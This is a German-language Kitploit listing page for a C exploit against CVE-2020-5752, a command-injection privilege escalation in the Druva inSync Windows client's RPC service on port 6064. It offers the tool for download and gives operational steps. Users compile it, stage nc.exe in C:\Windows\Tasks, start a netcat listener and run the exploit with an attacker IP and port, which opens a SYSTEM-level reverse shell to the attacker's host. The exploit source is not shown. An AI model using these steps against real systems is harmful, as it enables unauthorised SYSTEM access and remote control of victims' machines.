Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-5752 — Lokale Privilegieneskalation für Druva | Kitploit
Tools/GitHubGitHub/x0rbeexd/cve-2020-5752
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Lokale Privilegieneskalation für Druva

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-5752: Druva inSync Lokale Rechteausweitung

Ein C-basierter Exploit für den Druva inSync Windows Client (v6.6.3 und älter). Die Anwendung stellt einen RPC-Dienst auf Port 6064 bereit, der anfällig für Befehlsinjektion mittels Pfad-Traversal ist. Dadurch kann ein lokaler Benutzer beliebige Befehle als NT AUTHORITY\SYSTEM ausführen.

Details zur Sicherheitslücke

  • CVE: 2020-5752
  • Getestet auf: Windows 10 (x64)
  • Berechtigungsstufe: Lokale Rechteausweitung (LPE)

Verwendung

1. Kompilierung

Verwenden Sie gcc (MinGW), um den Quellcode zu kompilieren:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Vorbereitung

Platzieren Sie eine Kopie von nc.exe in einem Verzeichnis, auf das das SYSTEM-Konto zugreifen kann (z. B. C:\Windows\Tasks).

3. Ausführung

Starten Sie einen Listener auf Ihrer Angreifer-Maschine:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungszwecken. Die unbefugte Nutzung auf Systemen, für die Sie keine Testberechtigung haben, ist illegal.

Tool herunterladen